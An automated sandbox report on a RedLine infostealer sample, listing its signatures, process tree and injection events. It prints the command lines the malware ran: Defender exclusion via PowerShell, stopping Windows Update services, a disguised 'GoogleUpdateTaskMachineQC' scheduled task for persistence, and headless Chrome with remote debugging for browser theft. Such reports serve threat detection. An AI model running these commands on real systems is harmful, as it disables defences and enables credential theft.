Malware Analysis Report

2025-01-18 09:28

Sample ID 230812-hgcb8acd8x
Target f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe
SHA256 f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8601e619b670c78673bb
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8601e619b670c78673bb

Threat Level: Known bad

The file f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Themida packer

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 06:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 06:42

Reported

2023-08-12 06:44

Platform

win7-20230712-en

Max time kernel

68s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3020 set thread context of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <binary blob omitted> C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = <binary blob omitted> C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = <binary blob omitted> C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe

"C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 108

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef65d9758,0x7fef65d9768,0x7fef65d9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=51512 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data19MXG" --profile-directory="Default"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=800 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1224 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=51512 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1856 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1984 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\system32\taskeng.exe

taskeng.exe {DDDCC8F8-1519-4846-AB89-F44719735610} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2508 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2640 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=51512 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2740 --field-trial-handle=936,i,3073732542164724792,13895836957815719097,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

